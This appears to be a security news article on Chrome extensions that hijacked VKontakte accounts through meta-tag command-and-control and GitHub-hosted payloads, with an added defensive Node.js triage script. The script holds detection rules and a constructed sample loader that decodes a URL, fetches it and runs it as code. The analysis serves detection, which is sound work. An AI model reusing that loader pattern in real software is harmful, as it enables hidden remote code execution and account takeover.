Over 500,000 users of VKontakte, Russia’s largest social networking platform, have been targeted by a sophisticated malware campaign via Chrome extensions. These seemingly innocuous extensions have been covertly hijacking user accounts, posing as harmless customization tools for the platform.
Malicious Extensions and Account Hijacking
The extensions, posing as VKontakte customization tools, silently subscribe the user to groups run by the attackers, rewrite account settings every 30 days, and reuse the account's own security tokens so that these changes go through under the victim's session and look like the user's own actions. What looked at first like simple theme customization is a multi-stage account takeover.
The campaign consists of five Chrome extensions sharing the same malicious infrastructure; the largest, "VK Styles," reached 400,000 installs before it was removed. Instead of a conventional C2 server, the extensions use a VKontakte profile page as command-and-control: the payload URLs are hidden in the HTML metadata tags of that page, so a scan of the extension package finds no hard-coded C2 address, and the extensions' network traffic goes only to vk.com and GitHub.
Advanced Malware Delivery Techniques
Researchers from Koi uncovered the campaign while analyzing extensions that inject Yandex advertising scripts. The injected scripts use rotating metric identifiers, so a static signature written for one identifier misses the next. Obfuscated JavaScript functions in the extensions execute arbitrary code fetched from a GitHub repository controlled by the threat actor known as "2vk."
The delivery chain is built for evasion and for updates without review. On installation, the extensions inject code into every VK page the user visits. That code reads encoded instructions from the metadata tags of the attacker's VK profile, which tell it which additional payloads to download from GitHub and run. Because the extension package itself never changes, the threat actor can alter or extend the malicious behaviour at will without submitting a new version to the Chrome Web Store for review. Chrome's Manifest V3 and Web Store policies prohibit extensions from loading and executing remotely hosted code, so a loader of this shape is a policy violation regardless of what the payload does.
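The loader shape described above (content scripts on vk.com, instructions read from meta tags, a runtime fetch from GitHub, and strings executed as code) can be triaged statically. The Node.js script below is an added example, not code from Koi's report or from the extensions it describes; it takes a manifest and the extension's script sources, applies a small set of indicator rules, and classifies the result. The sample manifests and scripts at the bottom are constructed for illustration and are not the real extensions' code.

```javascript
// Added example, not code from Koi's report or from the extensions it describes:
// static triage of an unpacked Chrome extension for the indicators described
// above. The manifest and scripts at the bottom are constructed samples.
// Run with: node audit.js

const VK_HOST = /(^|\.)(vk\.com|vkontakte\.ru)$/i;

// Source indicators. A "loader" turns data into code; a "source" obtains data
// at runtime. Either alone is common in benign code; both together is the
// remote-code-loader shape the campaign used.
const SOURCE_RULES = [
  { id: "dynamic-eval",     kind: "loader", re: /\b(eval|new\s+Function)\s*\(/,           note: "executes a string as code" },
  { id: "script-injection", kind: "loader", re: /createElement\s*\(\s*["'`]script["'`]/i,  note: "injects a <script> element" },
  { id: "runtime-fetch",    kind: "source", re: /\b(fetch|XMLHttpRequest)\s*\(/,           note: "fetches data at runtime" },
  { id: "meta-tag-read",    kind: "source", re: /querySelector(All)?\s*\(\s*["'`]meta\[/i, note: "reads <meta> tags for instructions" },
  { id: "base64-decode",    kind: "source", re: /\batob\s*\(/,                             note: "decodes base64 runtime data" },
];

// "*://*.vk.com/*" -> "vk.com"; "<all_urls>" passes through; null if not a match pattern.
function matchPatternHost(pattern) {
  if (pattern === "<all_urls>") return pattern;
  const m = /^(\*|https?|file|ftp):\/\/([^/]+)\//.exec(pattern);
  return m ? m[2].replace(/^\*\./, "") : null;
}

function auditExtension(manifest, scripts) {
  const findings = [];

  // 1. Where do the content scripts run?
  const hosts = new Set();
  for (const cs of manifest.content_scripts || [])
    for (const p of cs.matches || []) {
      const h = matchPatternHost(p);
      if (h) hosts.add(h);
    }
  const onVk = [...hosts].filter(h => h === "<all_urls>" || VK_HOST.test(h));
  if (onVk.length) findings.push({ id: "content-script-on-vk", kind: "info", note: onVk.join(", ") });

  // 2. Can it reach GitHub (or everything) at runtime?
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  for (const p of perms) {
    const h = matchPatternHost(p);
    if (h === "<all_urls>" || (h && /github/i.test(h)))
      findings.push({ id: "host-permission-remote", kind: "source", note: p });
  }

  // 3. Source indicators, per file.
  for (const [file, src] of Object.entries(scripts))
    for (const rule of SOURCE_RULES)
      if (rule.re.test(src)) findings.push({ id: rule.id, kind: rule.kind, file, note: rule.note });

  const kinds = new Set(findings.map(f => f.kind));
  const verdict = kinds.has("loader") && kinds.has("source") ? "remote-code-loader"
                : kinds.has("loader") || kinds.has("source") ? "suspicious"
                : "no-remote-code";
  return { verdict, findings };
}

// Constructed sample resembling the behaviour described in the article.
const SUSPECT_MANIFEST = {
  manifest_version: 3,
  name: "Sample Theme (constructed)",
  content_scripts: [{ matches: ["*://*.vk.com/*"], js: ["content.js"] }],
  host_permissions: ["https://raw.githubusercontent.com/*"],
};
const SUSPECT_SCRIPTS = {
  "content.js": `
    // reads an encoded URL from a profile page's meta tag, fetches it and runs it
    const tag = document.querySelector('meta[name="x-cfg"]');
    const url = atob(tag.content);
    fetch(url).then(r => r.text()).then(code => new Function(code)());
  `,
};

// Constructed benign theme: a content script on vk.com, but no loader and no source.
const THEME_MANIFEST = {
  manifest_version: 3,
  name: "Sample Dark Theme (constructed)",
  content_scripts: [{ matches: ["*://*.vk.com/*"], css: ["dark.css"], js: ["toggle.js"] }],
  permissions: ["storage"],
};
const THEME_SCRIPTS = {
  "toggle.js": `chrome.storage.sync.get("dark", v => { document.documentElement.dataset.dark = !!v.dark; });`,
};

for (const [label, m, s] of [["suspect", SUSPECT_MANIFEST, SUSPECT_SCRIPTS],
                              ["theme", THEME_MANIFEST, THEME_SCRIPTS]]) {
  const { verdict, findings } = auditExtension(m, s);
  console.log(`${label}: ${verdict}`);
  for (const f of findings) console.log(`  ${f.id}${f.file ? " (" + f.file + ")" : ""}: ${f.note}`);
}
```

The rules are deliberately coarse: a single `fetch(` or `atob(` means nothing on its own, which is why the verdict keys on the combination of a loader and a data source rather than on any one string. Obfuscated bundles will hide some of these names, so a "no-remote-code" result is a reason to look less hard, not a clean bill of health.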
Security Implications and Recommendations
The malware abuses VKontakte's security mechanisms rather than breaking them: because it runs inside the victim's logged-in VK pages, it can read the CSRF protection cookies and attach them to its own requests, so the forged actions pass VK's checks as though the user had made them. In each session it subscribes the victim to the attacker's VK group with a 75% probability, building an audience through which the extensions are pushed to further victims, a self-propagating distribution network. Every 30 days it re-applies its changes to the account settings, overriding anything the user has restored, so control persists.
The operation ran from June 2025 to January 2026, with the code continuously developed and extended over those seven months. Security teams should audit the browser extensions installed across their fleet, monitor for unusual VK API activity such as group joins and settings changes the user did not initiate, and enforce an extension allowlist so that only approved extensions can be installed.
Users who notice unexpected group subscriptions or changed settings should remove any VK-related extensions they do not recognize and review the permissions of the extensions they keep.
